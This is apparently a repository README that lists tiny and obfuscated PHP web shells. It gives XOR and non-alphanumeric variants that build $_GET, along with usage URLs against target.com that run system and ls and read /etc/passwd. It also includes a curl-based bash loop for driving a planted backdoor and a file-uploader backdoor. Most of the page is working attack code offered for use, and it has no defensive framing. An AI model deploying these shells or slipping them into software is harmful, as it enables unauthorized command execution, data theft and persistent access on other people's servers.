Tiny-PHP-Webshell copied to clipboard
several list of simple and obfuscate PHP shell
Simple PHP Web Shell
Simple HTTP Requests GET Method Shell
[*] Usage: http://target.com/path/to/shell.php?0=command
Simple HTTP Requests POST Method Shell
[*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command"
Support GET and POST Requests Method
[*] Usage:
- http://target.com/path/to/shell.php?_=command
- curl -X POST http://target.com/path/to/shell.php -d "_=command"
Simple Obfuscated PHP Web Shell
Obfuscated PHP Web shell Example
[*] Usage: http://target.com/path/to/shell.php?0=command
[*] Note: This is obfuscation of <?=`$_GET[0]`?>
Non-alphanumeric obfuscation PHP Web Shell
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
[*] Usage: http://target.com/path/to/shell.php?_=function&__=argument
[*] E.g.: http://target.com/path/to/shell.php?_=system&__=ls
Another Example Obfuscation of Simple PHP Webshell
<?php $_=${'_'.('{{{' ^ '<>/')};$_[0]($_[1]); ?>
<?php $_=${'_'.('{'^'<').('{'^'>;').('{'^'/')};$_[0]($_[1]); ?>
[*] Usage: http://target.com/path/to/shell.php?0=function&1=argument
[*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls
in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:
<?php $_=${'_'.('{{{' ^ '<>/')};$_[0]($_[1]($_[2])); ?>
<?php $_=${'_'.('{'^'<').('{'^'>;').('{'^'/')};$_[0]($_[1]($_[2])); ?>
[*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument
[*] E.g.:
- http://target.com/path/to/shell.php?0=var_dump&1=scandir&2=.
- http://target.com/path/to/shell.php?0=print_r&1=file_get_contents&2=/etc/passwd
Without Space Obfuscation PHP Web Shell
[*] Usage: http://target.com/path/to/shell.php?0=function&1=argument
[*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls
in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:
[*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument
[*] E.g.: http://target.com/path/to/shell.php?0=print_r&1=glob&2=*
Without Space and Non-alphanumeric Obfuscation PHP Web Shell
[*] Usage: http://target.com/path/to/shell.php?__=function&___=argument
[*] E.g.: http://target.com/path/to/shell.php?__=system&___=ls
in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:
[*] Usage: http://target.com/path/to/shell.php?__=function1&___=function2&____=argument
[*] E.g.: http://target.com/path/to/shell.php?__=var_dump&___=scandir&____=/
Simple Bash Script For Handle Simple PHP Backdoor
while true;do read -p "[>] halah@wibu:~$ " cmd;curl $1$cmd;done
with url encode:
while true;do read -p "[>] halah@wibu:~$ " cmd;curl -G $1 --data-urlencode "0=$cmd";done
save into cli.sh and give access to execute with chmod +x cli.sh
[*] Usage:
./cli.sh http://target.com/path/to/shell.php?0=
File Uploader Backdoor
<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>